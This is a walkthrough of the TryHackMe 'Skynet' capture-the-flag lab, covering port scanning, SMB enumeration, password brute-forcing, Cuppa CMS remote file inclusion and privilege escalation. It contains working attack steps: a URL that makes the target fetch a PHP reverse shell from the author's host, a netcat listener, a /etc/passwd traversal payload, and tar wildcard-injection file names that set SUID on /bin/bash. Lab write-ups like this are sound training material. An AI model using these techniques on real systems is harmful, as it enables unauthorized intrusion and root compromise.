#tryhackme #linux #easy
![[Pasted image 20250624224650.png]]
---
# Port Scanning - Nmap
As always I began with scanning all TCP ports with Nmap.
```bash
root@ip-10-10-49-42:~# sudo nmap -sS 10.10.180.210 -Pn -n --open --min-rate 3000 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2025-06-25 01:28 BST
Nmap scan report for 10.10.180.210
Host is up (0.00054s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
MAC Address: 02:C4:8A:43:D0:67 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 2.37 seconds
```
When the initial scan is finished, I usually run another scan right after but this time port-scanning only against the ports found.
```bash
root@ip-10-10-49-42:~# nmap -sC -sV $IP -p 22,80,110,139,143,445
Starting Nmap 7.80 ( https://nmap.org ) at 2025-06-25 01:30 BST
Nmap scan report for ip-10-10-180-210.eu-west-1.compute.internal (10.10.180.210)
Host is up (0.00023s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: CAPA SASL TOP RESP-CODES AUTH-RESP-CODE PIPELINING UIDL
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: ID more have post-login OK LOGINDISABLEDA0001 capabilities ENABLE listed SASL-IR IMAP4rev1 LOGIN-REFERRALS Pre-login LITERAL+ IDLE
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 02:C4:8A:43:D0:67 (Unknown)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h39m58s, deviation: 2h53m12s, median: -1s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2025-06-24T19:31:10-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-06-25T00:31:10
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.48 seconds
```
Finally scanning top 1,000 UDP ports.
```bash
root@ip-10-10-49-42:~# nmap -sU $IP --min-rate 3000 --top-ports 1000
Starting Nmap 7.80 ( https://nmap.org ) at 2025-06-25 01:32 BST
Nmap scan report for ip-10-10-180-210.eu-west-1.compute.internal (10.10.180.210)
Host is up (0.00027s latency).
Not shown: 993 open|filtered ports
PORT STATE SERVICE
137/udp open netbios-ns
686/udp closed hcp-wismar
959/udp closed unknown
27899/udp closed unknown
36384/udp closed unknown
42313/udp closed unknown
49178/udp closed unknown
MAC Address: 02:C4:8A:43:D0:67 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.96 seconds
```
# Footprinting
##### Port 80
![[Pasted image 20250624193618.png]]
```bash
root@ip-10-10-49-42:~# gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.180.210
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 314] [--> http://10.10.180.210/admin/]
/css (Status: 301) [Size: 312] [--> http://10.10.180.210/css/]
/js (Status: 301) [Size: 311] [--> http://10.10.180.210/js/]
/config (Status: 301) [Size: 315] [--> http://10.10.180.210/config/]
/ai (Status: 301) [Size: 311] [--> http://10.10.180.210/ai/]
/squirrelmail (Status: 301) [Size: 321] [--> http://10.10.180.210/squirrelmail/]
/server-status (Status: 403) [Size: 278]
Progress: 218275 / 218276 (100.00%)
===============================================================
Finished
===============================================================
```
![[Pasted image 20250624203459.png]]
##### Port 445
I was able to list shares with `smbclient`. anonymous and milesdyson shares stood out to me.
```bash
root@ip-10-10-49-42:~# smbclient -N -L //$IP
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
```
`anonymous` share contained some files and I downloaded them locally to investigate further.
```bash
root@ip-10-10-49-42:~# smbclient -N //$IP/anonymous
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 26 16:04:00 2020
.. D 0 Tue Sep 17 08:20:17 2019
attention.txt N 163 Wed Sep 18 04:04:59 2019
logs D 0 Wed Sep 18 05:42:16 2019
9204224 blocks of size 1024. 5831508 blocks available
smb: \> cd logs
smb: \logs\> ls
. D 0 Wed Sep 18 05:42:16 2019
.. D 0 Thu Nov 26 16:04:00 2020
log2.txt N 0 Wed Sep 18 05:42:13 2019
log1.txt N 471 Wed Sep 18 05:41:59 2019
log3.txt N 0 Wed Sep 18 05:42:16 2019
9204224 blocks of size 1024. 5831508 blocks available
```
`attention.txt`
```bash
root@ip-10-10-49-42:~# cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
```
`log1.txt`
```bash
root@ip-10-10-49-42:~# cat log1.txt
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator
```
`log2.txt` and `log3.txt` are just empty files
```bash
root@ip-10-10-49-42:~# cat log2.txt
root@ip-10-10-49-42:~# cat log3.txt
root@ip-10-10-49-42:~# ls -l log2.txt
-rw-r--r-- 1 root root 0 Jun 25 01:38 log2.txt
root@ip-10-10-49-42:~# ls -l log3.txt
-rw-r--r-- 1 root root 0 Jun 25 01:38 log3.txt
```
```bash
crackmapexec smb $IP -U milesdyson -P log1.txt
```
The `log1.txt` contains what appears to be a list of passwords. This suggests that I should perform a brute-force attack against the SMB server to discover valid credentials.
Then I did.
```bash
root@ip-10-10-49-42:~# crackmapexec smb $IP -u 'skynet.local\miles' -p log1.txt
SMB 10.10.180.210 445 SKYNET [*] Windows 6.1 (name:SKYNET) (domain:) (signing:False) (SMBv1:True)
SMB 10.10.180.210 445 SKYNET [+] skynet.local\miles:cyborg007haloterminator
```
I found a set of valid credentials but I still wasn't able to access the `/milesdyson` SMB share. I suddenly remembered the `/squirrelmail` path I had discovered earlier using gobuster. What If I try the credentials there?
`miles:cyborg007haloterminator` didn't work. I tried his full name as the username and it let me in!
![[Pasted image 20250624203903.png]]
![[Pasted image 20250624203915.png]]
Let's read each email one by one starting with the first one. This is why the password found did not work.
![[Pasted image 20250624204100.png]]
The second email contains nothing but binary data. I'll make sure to convert it to text later.
![[Pasted image 20250624204207.png]]
And the last email in inbox.
![[Pasted image 20250624204457.png]]
I have converted the binary data found in the second email and the converted data appears to be very similar to contents found in the last email.
![[Pasted image 20250624204740.png]]
)s{A&2Z=F^n_E.B`
```bash
root@ip-10-10-49-42:~# smbclient //$IP/milesdyson -U milesdyson
Password for [WORKGROUP\milesdyson]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 17 10:05:47 2019
.. D 0 Wed Sep 18 04:51:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 10:05:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 10:05:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 10:05:14 2019
notes D 0 Tue Sep 17 10:18:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 10:05:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 10:05:14 2019
9204224 blocks of size 1024. 5810756 blocks available
smb: \>
```
I downloaded every single file there is in `milesdyson` share including the `notes` directory
```bash
smb: \> prompt OFF
smb: \> recurse ON
smb: \> mget notes
getting file \notes\3.01 Search.md of size 65601 as notes/3.01 Search.md (32030.2 KiloBytes/sec) (average 73885.3 KiloBytes/sec)
getting file \notes\4.01 Agent-Based Models.md of size 5683 as notes/4.01 Agent-Based Models.md (1849.9 KiloBytes/sec) (average 73533.4 KiloBytes/sec)
getting file \notes\2.08 In Practice.md of size 7949 as notes/2.08 In Practice.md (2587.5 KiloBytes/sec) (average 73188.4 KiloBytes/sec)
getting file \notes\0.00 Cover.md of size 3114 as notes/0.00 Cover.md (1520.4 KiloBytes/sec) (average 72956.8 KiloBytes/sec)
getting file \notes\1.02 Linear Algebra.md of size 70314 as notes/1.02 Linear Algebra.md (34331.3 KiloBytes/sec) (average 72832.4 KiloBytes/sec)
```
Then this file named `important.txt` caught my eyes.
```bash
root@ip-10-10-49-42:~/notes# cat important.txt
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
```
I navigated to `10.10.180.210/45kra24zxs28v3yd` and found this page below.
![[Pasted image 20250624210146.png]]
Ran a gobuster against that path and enumerated `/administrator`.
```bash
root@ip-10-10-49-42:~/notes# gobuster dir -u http://$IP/45kra24zxs28v3yd -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.180.210/45kra24zxs28v3yd
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/administrator (Status: 301) [Size: 339] [--> http://10.10.180.210/45kra24zxs28v3yd/administrator/]
Progress: 218275 / 218276 (100.00%)
===============================================================
Finished
===============================================================
root@ip-10-10-49-42:~/notes#
```
`/administrator` revealed the name of the CMS being used: `Cuppa`.
![[Pasted image 20250624211610.png]]
# Exploit
I searched `cuppa` in searchsploit and there was one known vulnerability to Cuppa CMS.
```bash
root@ip-10-10-50-98:~# searchsploit cuppa
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Rem | php/webapps/25971.txt
---------------------------------------------- ---------------------------------
Shellcodes: No Results
```
The exploit `25971.txt` describes that we can perform a RFI attack which can lead to full server compromise.
```bash
#####################################################
DESCRIPTION
#####################################################
An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.
http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
#####################################################
EXPLOIT
#####################################################
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
Moreover, We could access Configuration.php source code via PHPStream
```
Preparing the attack, I downloaded the famous `Pentest Monkey`'s php reverse shell which I'm going to use to receive the shell.
![[Pasted image 20250624215533.png]]
I'm going to host an HTTP server using Python. This server will host my reverse shell payload. The goal is to link my reverse shell payload to the path specified in the PoC description. This way, as soon as the reverse shell connects, I should receive a shell on my listener.
```bash
root@ip-10-10-50-98:~# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```
```bash
root@ip-10-10-50-98:~# nc -lvnp 1234
Listening on 0.0.0.0 1234
```
This is the full path that I make a request to.
```bash
http://10.10.237.190/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.50.98:8000/php-reverse-shell.php
```
Upon navigating to that URL in the browser, I immediately saw that my reverse shell being downloaded.
```bash
root@ip-10-10-50-98:~# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.237.190 - - [25/Jun/2025 04:02:28] "GET /php-reverse-shell.php HTTP/1.0" 200 -
```
Checking Netcat listener, I saw that I had a reverse shell as expected.
```bash
root@ip-10-10-50-98:~# nc -lvnp 1234
Listening on 0.0.0.0 1234
Connection received on 10.10.237.190 47674
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
22:02:27 up 37 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
```
Found `user.txt`!
```bash
$ cd milesdyson
$ ls
backups
mail
share
user.txt
$ cat user.txt
7ce5...
```
# Privilege Escalation
`cat /etc/crontab` reveals that `backup.sh` file is scheduled to run every minute.
```bash
www-data@skynet:/home/milesdyson$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/1 * * * * root /home/milesdyson/backups/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
```
Unfortunately we cannot modify the file since we do not have `write` permissions.
```bash
www-data@skynet:/home/milesdyson$ ls -l /home/milesdyson/backups/backup.sh
-rwxr-xr-x 1 root root 74 Sep 17 2019 /home/milesdyson/backups/backup.sh
```
What backup.sh file does is it creates an backup archive of the web every minute. It first changes directory to `/var/www/html` and uses tar to compress the content of that directory into an archive.
```bash
www-data@skynet:/home/milesdyson/backups$ cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
```
I was stuck here and I was not able to finish the PrivEsc on my own. So what comes after is what I've gathered from other people's write ups.
Apparently, there's a technique called **Wildcard Injection**, which takes advantage of the wildcard in the tar command.
In order to exploit this vulnerability, we are going to proceed as follows:
1. Create a script to set the SUID bit to `/bin/bash`
```bash
echo -e '#!/bin/bash\nchmod +s /bin/bash' > /var/www/html/root_shell.sh
```
2. Create these two files:
1. `--checkpoint-action=exec=sh root_shell.sh`
2. `--checkpoint=1`
```bash
touch "/var/www/html/--checkpoint-action=exec=sh root_shell.sh"
touch "/var/www/html/--checkpoint=1"
```
`--checkpoint-action=ACTION` and `--checkpoint=NUMBER` are two options available with `tar` command.
- `--checkpoint=NUMBER` displays progress messages every `Number`th record.
- `--checkpoint-action=ACTION` executes ACTION on each checkpoint. In our case `exec`.
- `exec=command` executes the specified command (`sh root_shell.sh)
Therefore, when the cronjob will execute the next time, it will take the two files we created above as options rather than normal filenames and set `/bin/bash` with SUID permissions.
Got the `root.txt` flag
```bash
www-data@skynet:/home/milesdyson/backups$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1037528 Jul 12 2019 /bin/bash
www-data@skynet:/home/milesdyson/backups$ /bin/bash -p
bash-4.3# whoami
root
bash-4.3# cd /root
bash-4.3# ls
root.txt
bash-4.3# cat root.txt
3f0372db24753accc7179a282cd6a949
```